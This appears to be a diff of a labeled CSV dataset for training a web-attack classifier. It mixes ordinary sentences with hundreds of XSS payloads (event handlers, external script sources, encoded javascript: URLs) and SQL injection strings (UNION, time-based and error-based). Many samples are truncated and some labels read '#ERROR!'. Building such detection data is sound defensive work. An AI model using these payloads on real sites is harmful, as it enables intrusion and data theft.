-"<col onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,3628 -"-9439"" ) where 9460 = 9460 or ( 9497 = 9586 ) *958",2,SQLi,13932 -"<style>@keyframes slidein {}</style><dt style=""ani",1,XSS,2694 -"))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE",2,SQLi,11253 -"-4287%"" ) ) union all select 9074,9074,9074,9074,9",2,SQLi,16313 -><script+src=https://wb.amap.com/channel.php?callb,1,XSS,9790 -waitfor delay '0:0:20' --,2,SQLi,10922 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10818 -1' ) where 3331 = 3331 or 5356 = ( select count ( ,2,SQLi,22300 -1 ) as rsyw where 4857 = 4857 or ( select 2* ( if ,2,SQLi,19542 -admin') or ('1'='1'--,2,SQLi,9915 -"1"" where 2483 = 2483",2,SQLi,16199 -Sort cards.,0,normal,23053 -"&lt;A HREF=\""http&#58;//www&#46;google&#46;com&#46",1,XSS,1060 -"1"" ) ) union all select null#",2,SQLi,21021 -1' ) as dqgr where 2427 = 2427 and ( 3020 = 3020 ),2,SQLi,19627 -"<;A HREF="";javascript:document.location=';http://w",1,XSS,1679 -Show me where it's located.,0,normal,23277 -<style>:target {color: red;}</style><marquee id=x ,1,XSS,6375 -"<embed onmousemove=""alert(1)"">test</embed>",1,XSS,7575 -"1%"" and 5411 = 7697 and ""%"" = """,2,SQLi,14821 -1 ) where 2083 = 2083,2,SQLi,18142 -1' in boolean mode ) procedure analyse ( extractva,2,SQLi,22404 -"1, ( select ( case when ( 3888 = 3888 ) then ( sel",2,SQLi,12384 -1 ( select ( case when ( 4587 = 4587 ) then regexp,2,SQLi,21501 -"<track onmouseenter=""alert(1)"">test</track>",1,XSS,8756 -Where did you find that vintage record from?,0,normal,23793 -"1%"" ) ) ( select ( case when ( 5451 = 5451 ) then ",2,SQLi,19175 -1 ) where 6954 = 6954 and 3824 = benchmark ( 50000,2,SQLi,17248 -1' ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113,2,SQLi,15935 -Select a scent for your room.,0,normal,24243 -"-8673"" ) or make_set ( 9354 = 9354,7185 ) and ( ""e",2,SQLi,17869 -Where's your SQL output?,0,normal,23420 -Select the best course for your education.,0,normal,24106 -select sleep ( 5 ) # wihl,2,SQLi,22362 -"1 ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,21519 +<keygen onpointerdown=alert(1)>XSS</keygen>,1,XSS,3630 +"1%' ) ) union all select null,null,null,null,null,",2,SQLi,13934 +"<ruby oncut=""alert(1)"" contenteditable>test</ruby>",1,XSS,2695 +")) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337",2,SQLi,11255 +"1%"" ) ) or 4915 = ( select count ( * ) from domain",2,SQLi,16315 +><script+src=http://api.m.sm.cn/rest?method=tools.,1,XSS,9792 +""" waitfor delay '0:0:20' --",2,SQLi,10924 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10820 +"-3609"" ) ) as fzyp where 9474 = 9474 or 9323 = 932",2,SQLi,22302 +"1"" where 1765 = 1765 union all select null,null,nu",2,SQLi,19544 +admin') or ('1'='1'/*,2,SQLi,9917 +1%' and ( 2439 = 2555 ) *2555 and '%' = ',2,SQLi,16201 +Find missing sock.,0,normal,23055 +"&lt;A HREF=\""javascript&#058;document&#46;location",1,XSS,1061 +-5585%' ) ) ) or 6990 = 7727,2,SQLi,21023 +"1%"" ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ",2,SQLi,19629 +"<;A HREF="";http://www.gohttp://www.google.com/ogle",1,XSS,1680 +Determine conditions where needed.,0,normal,23279 +"<svg ondblclick=""alert(1)"">test</svg>",1,XSS,6377 +"<element onmousedown=""alert(1)"">test</element>",1,XSS,7577 +"-2059%"" or elt ( 4587 = 3101,3101 ) and ""%"" = """,2,SQLi,14823 +"1"" ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7",2,SQLi,18144 +1 ) ) ) union all select null--,2,SQLi,22406 +"1 ) union all select null,null,null,null,null,null",2,SQLi,12386 +1'|| ( select 'flre' where 8250 = 8250 or 8421 = (,2,SQLi,21503 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8758 +I need to decide where to go for a concert.,0,normal,23795 +1'+ ( select basp where 6953 = 6953,2,SQLi,19177 +1' ) ) rlike ( select * from ( select ( sleep ( 5 ,2,SQLi,17250 +"-8128"" ) ) as ovjz where 7375 = 7375 union all sel",2,SQLi,15937 +Select the best ingredients for baking.,0,normal,24245 +"-4721' ) or elt ( 4378 = 5165,5165 ) and ( 'fufn' ",2,SQLi,17871 +Where's your SQL repository?,0,normal,23422 +Select a class to improve your skills.,0,normal,24108 +1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,22364 +"-4317"" ) ) as nxvn where 2566 = 2566 union all sel",2,SQLi,21521 "<script src=data:text/javascript;base64,YWxlcnQoMS",1,XSS,207 -end and ( ( ( 'xzbk' = 'xzbk,2,SQLi,20873 -Locate items where valid.,0,normal,23323 -The Financial Select Sector SPDR Fund (XLF) droppe,0,normal,25447 -1'|| ( select 'omeg' from dual where 4751 = 4751,2,SQLi,12686 -<small onfocusout=alert(1) tabindex=1 id=x></small,1,XSS,6911 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) #",2,SQLi,20875 +Check values where valid.,0,normal,23325 +The film will be screening for free in select thea,0,normal,25449 +"-2314%' ) ) union all select 4612,4612--",2,SQLi,12688 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6913 "<a href=""\x00javascript:javascript:alert(1)"" id=""f",1,XSS,503 -Where did you find that charming café?,0,normal,23770 -"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,17413 -"select pg_sleep ( 5 ) and ( ( ""byhx"" like ""byhx",2,SQLi,20225 -"{""id"":null,""name"":""Indochinese Tiger""}",0,normal,27267 -"1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71,",2,SQLi,13774 -<code id=x tabindex=1 onfocus=alert(1)></code>,1,XSS,8111 --9405' union all select 2539--,2,SQLi,14949 -"<button draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,5057 -"<XML SRC=""xsstest.xml"" ID=I></XML>",1,XSS,9763 -Select pub.,0,normal,24539 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10966 -1' and ( 3435 = 7210 ) *7210 and 'lxxt' = 'lxxt,2,SQLi,19116 -The run is for select dates from June through Sept,0,normal,25381 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,14040 -select * from users where id = '1' <@$_ or 1 = 1 -,2,SQLi,11838 -<ins onblur=alert(1) tabindex=1 id=x></ins><input ,1,XSS,2455 -Where's the yoga studio?,0,normal,23600 -1 ) ) and 8514 = ( select count ( * ) from domain.,2,SQLi,19489 -1'|| ( select 'boib' where 9595 = 9595,2,SQLi,15266 -1%' ) or 7427 = dbms_pipe.receive_message ( chr ( ,2,SQLi,13068 -"<figure onmousemove=""alert(1)"">test</figure>",1,XSS,8393 -Create a striking artwork.,0,normal,22663 -1' waitfor delay '0:0:5',2,SQLi,19484 -"<br onmouseleave=""alert(1)"">test</br>",1,XSS,6185 -"{""id"":null,""firstName"":""Joanne"",""lastName"":""Ong"",""",0,normal,26855 -"<listing onclick=""alert(1)"">test</listing>",1,XSS,3562 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5893 -"1"" ) or 4240 = ( select 4240 from pg_sleep ( 5 ) )",2,SQLi,12667 -select ( case when ( 9619 = 8679 ) then 1 else 961,2,SQLi,13987 +I'm considering where to go for relaxation.,0,normal,23772 +"1%"" ) or 5356 = ( select count ( * ) from sysusers",2,SQLi,17415 +"1%' ) ) union all select null,null,null,null,null,",2,SQLi,20227 +"{""id"":null,""name"":""route actually""}",0,normal,27270 +"-7601"" ) ) ) union all select 1293,1293,1293,1293,",2,SQLi,13776 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8113 +select ( case when ( 1272 = 5883 ) then 1272 else ,2,SQLi,14951 +<isindex onpointerenter=alert(1)>XSS</isindex>,1,XSS,5059 +"<?xml:namespace prefix=""t"" ns=""urn:schemas-microso",1,XSS,9765 +Select club.,0,normal,24541 +#ERROR!,2,SQLi,10968 +"1"" ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76",2,SQLi,19118 +The RFID chip in the key fob contains a select set,0,normal,25383 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,14042 +"select * from users where id = 1 or "" ( &"" or 1 = ",2,SQLi,11840 +<meta onpointerenter=alert(1)>XSS</meta>,1,XSS,2456 +Where's the tennis court?,0,normal,23602 +1' waitfor delay '0:0:5' and 'vwuz' = 'vwuz,2,SQLi,19491 +"-4934"" union all select 5119,5119,5119,5119,5119--",2,SQLi,15268 +"-7084 ) where 2260 = 2260 or elt ( 1032 = 1032,362",2,SQLi,13070 +"<wbr draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,8395 +Join the language class.,0,normal,22665 +1' ) as vmmk where 5757 = 5757 or 9643 = ( select ,2,SQLi,19486 +<section onpointerout=alert(1)>XSS</section>,1,XSS,6187 +"{""id"":null,""firstName"":""Chng"",""lastName"":""Meng Khu",0,normal,26857 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3564 +"<style>@keyframes x{}</style><sub style=""animation",1,XSS,5895 +1 ) ) ) and 8594 = ( select 8594 from pg_sleep ( 5,2,SQLi,12669 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,13989 "<marquee onStart marquee onStart=""javascript:javas",1,XSS,392 -"<var ondblclick=""alert(1)"">test</var>",1,XSS,6737 -"-4923"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ",2,SQLi,22003 -<frameset id=x tabindex=1 onfocus=alert(1)></frame,1,XSS,5259 -"-7337"" union all select 7294,7294,7294,7294,7294,7",2,SQLi,15423 -I go to the wine shop and select a few bottles.,0,normal,26072 -"<samp onkeyup=""alert(1)"" contenteditable>test</sam",1,XSS,2696 -<title onpointerup=alert(1)>XSS</title>,1,XSS,2028 -select case when 3995 = 8680 then 1 else null end-,2,SQLi,21848 -"<multicol draggable=""true"" ondragstart=""alert(1)"">",1,XSS,2569 -<u onpointerup=alert(1)>XSS</u>,1,XSS,8007 -"1' in boolean mode ) and 4241 = convert ( int, ( s",2,SQLi,16217 -"1' ) ) union all select null,null#",2,SQLi,16449 -1' where 5035 = 5035 and 8594 = ( select 8594 from,2,SQLi,18447 -"<center draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,5277 -<base id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,7209 -"You have to click on the ""..."" menu, then select a",0,normal,25069 -<style>:target {color: red;}</style><aside id=x st,1,XSS,8572 -"<aside onpaste=""alert(1)"" contenteditable>test</as",1,XSS,6332 -"1%"" ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x",2,SQLi,21244 -"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,12186 -waitfor delay '0:0:5'#,2,SQLi,21272 -"<script> location.href = 'data:text/html;base64,PH",1,XSS,9269 -"1"" ) as jask where 7629 = 7629 or 2633 = dbms_pipe",2,SQLi,17263 -<style>:target {color:red;}</style><progress id=x ,1,XSS,8530 -Select the best ingredients.,0,normal,24301 -Locate items where necessary.,0,normal,23248 -Select your dream car.,0,normal,24277 -Select the wine.,0,normal,22824 -Select the right playlist for the mood.,0,normal,24254 +"<map oncopy=""alert(1)"" contenteditable>test</map>",1,XSS,6739 +1' in boolean mode ) union all select null#,2,SQLi,22005 +<br onblur=alert(1) tabindex=1 id=x></br><input au,1,XSS,5261 +"-2111' union all select 1061,1061,1061--",2,SQLi,15425 +"However, select older model media players won't of",0,normal,26074 +"<header draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2697 +<select onchange=alert(1)><option>change me</optio,1,XSS,2029 +1'+ ( select 'ayod' where 7839 = 7839 or ( select ,2,SQLi,21850 +"<tbody onmousemove=""alert(1)"">test</tbody>",1,XSS,2570 +"<datalist onbeforecopy=""alert(1)"" contenteditable>",1,XSS,8009 +1 or 8421 = ( select count ( * ) from generate_ser,2,SQLi,16219 +1%' ) union all select null#,2,SQLi,16451 +"1', ( select ( case when ( 5154 = 5154 ) then 1 el",2,SQLi,18449 +"<style>@keyframes x{}</style><hgroup style=""animat",1,XSS,5279 +"<big onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,7211 +You have only three options to select.,0,normal,25071 +"<listing draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,8574 +"<hr onpaste=""alert(1)"" contenteditable>test</hr>",1,XSS,6334 +"1%' and extractvalue ( 7982,concat ( 0x5c,0x717170",2,SQLi,21246 +"1' ) ) ) and row ( 6237,7469 ) > ( select count ( ",2,SQLi,12188 +1' ) rlike ( select ( case when ( 2721 = 8716 ) th,2,SQLi,21274 +<script> var+MouseEvent=function+MouseEvent(){}; M,1,XSS,9271 +"-9820"" or 1038 = 7502#",2,SQLi,17265 +"<image onmouseleave=""alert(1)"">test</image>",1,XSS,8532 +Select the top priority.,0,normal,24303 +Filter rows where required.,0,normal,23250 +Please select a team.,0,normal,24279 +Delete the apps.,0,normal,22826 +Select a style for the haircut.,0,normal,24256 &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b,1,XSS,1017 -"Olsson will work with select ""tribe leaders"" to cr",0,normal,25852 -<slot id=x tabindex=1 onactivate=alert(1)></slot>,1,XSS,7630 -select * from users where id = 1 + \+%1 or 1 = 1 -,2,SQLi,11535 +OLED?) when an old TV breaks and you must select a,0,normal,25854 +"SRC=""javascript:alert('')",1,XSS,7632 +"select * from users where id = 1 or ""%&"" or 1 = 1 ",2,SQLi,11537 "&lt;META HTTP-EQUIV=\""refresh\"" CONTENT=\""0; URL=h",1,XSS,996 -select,0,normal,26558 -"<var onkeyup=""alert(1)"" contenteditable>test</var>",1,XSS,4298 +select,0,normal,26560 +"<menu onclick=""alert(1)"">test</menu>",1,XSS,4300 <svg><animate xlink:href=#xss attributeName=href d,1,XSS,162 -<svg onpointermove=alert(1)>XSS</svg>,1,XSS,5676 -"<canvas draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,6874 -1'|| ( select 'jlon' where 1461 = 1461,2,SQLi,12991 -><img src=x onerror=alert('XSS');>,1,XSS,9693 -"<frameset onbeforecut=""alert(1)"" contenteditable>t",1,XSS,7990 -"1%"" ) ) ) rlike ( select * from ( select ( sleep (",2,SQLi,20228 -"1"" ) as assu where 7521 = 7521 or 5356 = ( select ",2,SQLi,13418 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#",2,SQLi,10806 -select * from users where id = 1 <@<@ or 1 = 1 -- ,2,SQLi,11654 -"&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\""",1,XSS,1022 -"1%"" ) ) and 6969 = ( select 6969 from pg_sleep ( 5",2,SQLi,19458 -I want to select the perfect outfit for the occasi,0,normal,23940 -"<ruby onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,3944 -<;BODY ONLOAD=alert(';XSS';)>;,1,XSS,1586 -where,0,normal,26532 -"<keygen onkeyup=""alert(1)"" contenteditable>test</k",1,XSS,3153 -1'+ ( select dgnt where 4701 = 4701 or 7427 = dbms,2,SQLi,14542 -<section id=x tabindex=1 ondeactivate=alert(1)></s,1,XSS,8227 -1' ) where 7629 = 7629 rlike ( select * from ( sel,2,SQLi,12207 -select ( case when ( 8375 = 8318 ) then 8375 else ,2,SQLi,17160 -"{""id"":null,""name"":""Abyssinian""}",0,normal,27133 -"1, ( select ( case when ( 5777 = 5777 ) then 1 els",2,SQLi,15788 -"If not, you can select from a great array of dildo",0,normal,26055 -Where's the treasure?,0,normal,23484 -"1"" and 8312 = dbms_pipe.receive_message ( chr ( 69",2,SQLi,21871 -Select the best photo.,0,normal,22620 -Its most important early charter was that granted ,0,normal,25940 -Where's your SQL job?,0,normal,23426 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2613 -I'm considering where to have a picnic with friend,0,normal,23898 -"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(",2,SQLi,11017 -AS INJECTX WHERE 1=1 AND 1=0#,2,SQLi,10234 -"<style>@keyframes x{}</style><marquee style=""anima",1,XSS,8434 -ORDER BY 12--,2,SQLi,10254 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10556 -<param id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,8793 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10628 -1 where 7021 = 7021 or 6793 = ( select 6793 from p,2,SQLi,21778 -select ( case when ( 3681 = 5026 ) then 3681 else ,2,SQLi,14503 -"{""id"":null,""name"":""thou bag""}",0,normal,27465 -<br id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,8839 -"<plaintext onmouseup=""alert(1)"">test</plaintext>",1,XSS,3891 -<marquee onpointerout=alert(1)>XSS</marquee>,1,XSS,3557 -"select * from users where id = 1 or ""%{"" or 1 = 1 ",2,SQLi,11395 -"1%' ) ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17913 -><img src=x onerror=javascript:alert((A))>,1,XSS,1268 -Select a topic for a conversation.,0,normal,24119 -"d=""alert('');\"")"";",1,XSS,1900 -1' ) where 3255 = 3255 or char ( 119 ) ||char ( 10,2,SQLi,21043 -<div onpointerup=alert(1)>XSS</div>,1,XSS,3006 -"-2725"" union all select 3671,3671,3671,3671,3671#",2,SQLi,19119 +<menuitem onpointerover=alert(1)>XSS</menuitem>,1,XSS,5678 +<td id=x tabindex=1 onbeforeactivate=alert(1)></td,1,XSS,6876 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,12993 +"<svg/onload=alert(String.fromCharCode(88,83,83))>",1,XSS,9695 +"<style>@keyframes slidein {}</style><mark style=""a",1,XSS,7992 +"1"" ) as axua where 6718 = 6718",2,SQLi,20230 +"1' in boolean mode ) union all select null,null--",2,SQLi,13420 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#",2,SQLi,10808 +select * from users where id = '1' <@<@ union sele,2,SQLi,11656 +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&,1,XSS,1023 +-4480' ) where 4661 = 4661 or 1570 = convert ( int,2,SQLi,19460 +I want to select a class to enroll in.,0,normal,23942 +"<section oncopy=""alert(1)"" contenteditable>test</s",1,XSS,3946 +"<;DIV STYLE="";background-image: url(javascript:ale",1,XSS,1587 +word1,0,normal,26534 +"<caption onbeforepaste=""alert(1)"" contenteditable>",1,XSS,3155 +"1%' ) or row ( 1045,7562 ) > ( select count ( * ) ",2,SQLi,14544 +"<tfoot onmousemove=""alert(1)"">test</tfoot>",1,XSS,8229 +select ( case when ( 1275 = 7674 ) then 1275 else ,2,SQLi,12209 +1 and 9254 = ( select count ( * ) from rdb$fields ,2,SQLi,17162 +"{""id"":null,""name"":""Affenpinscher""}",0,normal,27136 +"1' ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( 'k",2,SQLi,15790 +"If large images still look jagged, click Tools wit",0,normal,26057 +Where are my keys?,0,normal,23486 +1' ) where 6408 = 6408,2,SQLi,21873 +Filter the noisy traffic.,0,normal,22622 +Its companion volume of Select Charters and other ,0,normal,25942 +Where's your SQL duty?,0,normal,23428 +<dfn onpointerdown=alert(1)>XSS</dfn>,1,XSS,2614 +Let's decide where to have our team meeting.,0,normal,23900 +"""),(select%20if(count(*)!=-1,benchmark(3000000,MD5",2,SQLi,11019 +AS INJECTX WHERE 1=1 AND 1=0--,2,SQLi,10236 +"<style>@keyframes x{}</style><progress style=""anim",1,XSS,8436 +ORDER BY 14--,2,SQLi,10256 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10558 +<style>@keyframes slidein {}</style><menuitem styl,1,XSS,8795 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10630 +"1"" ) where 8095 = 8095 and 2853 = cast ( ( chr ( 1",2,SQLi,21780 +"-5780 or make_set ( 3464 = 4518,4518 ) -- icit",2,SQLi,14505 +"{""id"":null,""name"":""successful""}",0,normal,27470 +"<multicol draggable=""true"" ondragenter=""alert(1)"">",1,XSS,8841 +"<sup onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,3893 +"<hgroup draggable=""true"" ondragend=""alert(1)"">test",1,XSS,3559 +"select * from users where id = 1 or ""%?"" or 1 = 1 ",2,SQLi,11397 +-6412 ) ) as cnfs where 6557 = 6557 union all sele,2,SQLi,17915 +><img src=x onerror=javascript:alert(('A'))>,1,XSS,1269 +Select a recipe to try cooking.,0,normal,24121 +"<li onmouseup=""alert(1)"">test</li>",1,XSS,1901 +"-9896"" ) ) ) union all select 4073,4073,4073,4073,",2,SQLi,21045 +<svg><tfoot onload=alert(1)></tfoot>,1,XSS,3007 +1 where 3956 = 3956,2,SQLi,19121 <svg><script>&#97;lert(1)</script></svg>,1,XSS,190 -Always try to select the appropriate newsgroup for,0,normal,26383 -Silk scarves and suit covers are a select part of ,0,normal,25552 -"<meta onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,2748 -1' ) ) ) and 6414 = ( select count ( * ) from rdb$,2,SQLi,18432 -Select a fragrance for your home.,0,normal,24234 -1 ) where 3979 = 3979 rlike sleep ( 5 ) --,2,SQLi,18943 -Select a medium or dark eyeliner color for lining ,0,normal,25659 -"<rtc onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,8667 -"{""id"":null,""firstName"":""Brandon"",""lastName"":""Lee"",",0,normal,27481 -<iframe onreadystatechange=alert(1)></iframe>,1,XSS,6397 -"1%"" ) ) union all select null,null,null,null,null-",2,SQLi,19770 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,20940 -1' where 6583 = 6583,2,SQLi,17569 -"<video autoplay onplaying=alert(1)><source src=""va",1,XSS,6421 -"<q onkeydown=""alert(1)"" contenteditable>test</q>",1,XSS,5052 -"<center onmouseover=""alert(1)"">test</center>",1,XSS,5312 -"<style>@keyframes x{}</style><source style=""animat",1,XSS,2434 -Sort results where required.,0,normal,23334 -"{""id"":null,""name"":""post""}",0,normal,26968 +Although many individual skuas keep the same mate ,0,normal,26385 +Shoppers can either choose the items they want pla,0,normal,25554 +"<aside onbeforecut=""alert(1)"" contenteditable>test",1,XSS,2749 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,18434 +Select a quote to live by.,0,normal,24236 +1%' ) ) and 1651 = 9324 and ( ( '%' = ',2,SQLi,18945 +Select a fabric for the chair that picks up either,0,normal,25661 +<div id=x tabindex=1 onfocus=alert(1)></div>,1,XSS,8669 +"{""id"":null,""firstName"":""Jia"",""lastName"":""Huiz"",""ad",0,normal,27486 +"<select onmousemove=""alert(1)"">test</select>",1,XSS,6399 +1'+ ( select 'yahq' where 6974 = 6974 union all se,2,SQLi,19772 +1' ) rlike ( select ( case when ( 7689 = 7689 ) th,2,SQLi,20942 +"-5210"" ) where 7176 = 7176 or 6872 = 6872--",2,SQLi,17571 +"<b onmouseenter=""alert(1)"">test</b>",1,XSS,6423 +<body onpointerup=alert(1)>XSS</body>,1,XSS,5054 +"<style>@keyframes x{}</style><tt style=""animation-",1,XSS,5314 +"<ol onkeypress=""alert(1)"" contenteditable>test</ol",1,XSS,2435 +Calculate sums where necessary.,0,normal,23336 +"{""id"":null,""firstName"":""Danish"",""lastName"":""Hilman",0,normal,26970 "<OBJECT TYPE=""text/x-scriptlet"" DATA=""%(scriptlet)",1,XSS,770 -"perl -e &#039;print \"";<;IMG SRC=java\0script:aler",1,XSS,1686 -"<time oncontextmenu=""alert(1)"">test</time>",1,XSS,8323 -1' in boolean mode ) or ( select * from ( select (,2,SQLi,16024 -"{""id"":null,""name"":""Pagumon""}",0,normal,27496 -"email='XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z",2,SQLi,11364 -"1%"" ) or ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,14424 -"1%' union all select null,null,null,null,null,null",2,SQLi,21963 -"<xmp onmouseenter=""alert(1)"">test</xmp>",1,XSS,4427 -"1 ) where 3740 = 3740 union all select null,null,n",2,SQLi,16851 -<textarea id=x tabindex=1 onbeforedeactivate=alert,1,XSS,6266 -1 ) and 7533 = 7533 and ( 7175 = 7175,2,SQLi,22119 -||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=,2,SQLi,11285 -declare @s varchar ( 200 ) select @s = 0x776169746,2,SQLi,11965 -1 ) ) as qlkf where 6635 = 6635,2,SQLi,21576 -"<tr onclick=""alert(1)"">test</tr>",1,XSS,5391 +"perl -e &#039;print \"";<;SCR\0IPT>;alert(\"";XSS\"";",1,XSS,1687 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8325 +1 ) where 3381 = 3381,2,SQLi,16026 +"{""id"":null,""firstName"":""Pauline"",""lastName"":""Fong""",0,normal,27501 +#ERROR!,2,SQLi,11366 +"select * from generate_series ( 9434,9434,case whe",2,SQLi,14426 +1%' ) and 9660 = ( select count ( * ) from all_use,2,SQLi,21965 +"<style>@keyframes slidein {}</style><area style=""a",1,XSS,4429 +"1"" ) and 3754 = ( select upper ( xmltype ( chr ( 6",2,SQLi,16853 +<svg><strike onload=alert(1)></strike>,1,XSS,6268 +"-4711%"" ) ) union all select 6737,6737,6737,6737#",2,SQLi,22121 +"AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--",2,SQLi,11287 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11967 +"-9569%' ) ) union all select 8405,8405,8405,8405--",2,SQLi,21578 +<track id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,5393 "<a href=""javascript:void(0)"" onmouseover=&NewLine;",1,XSS,861 -1' ) ) or 8315 = ( select count ( * ) from sysibm.,2,SQLi,15796 -Where's the yoga class?,0,normal,23655 +"1"" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,15798 +Where's the mindfulness workshop?,0,normal,23657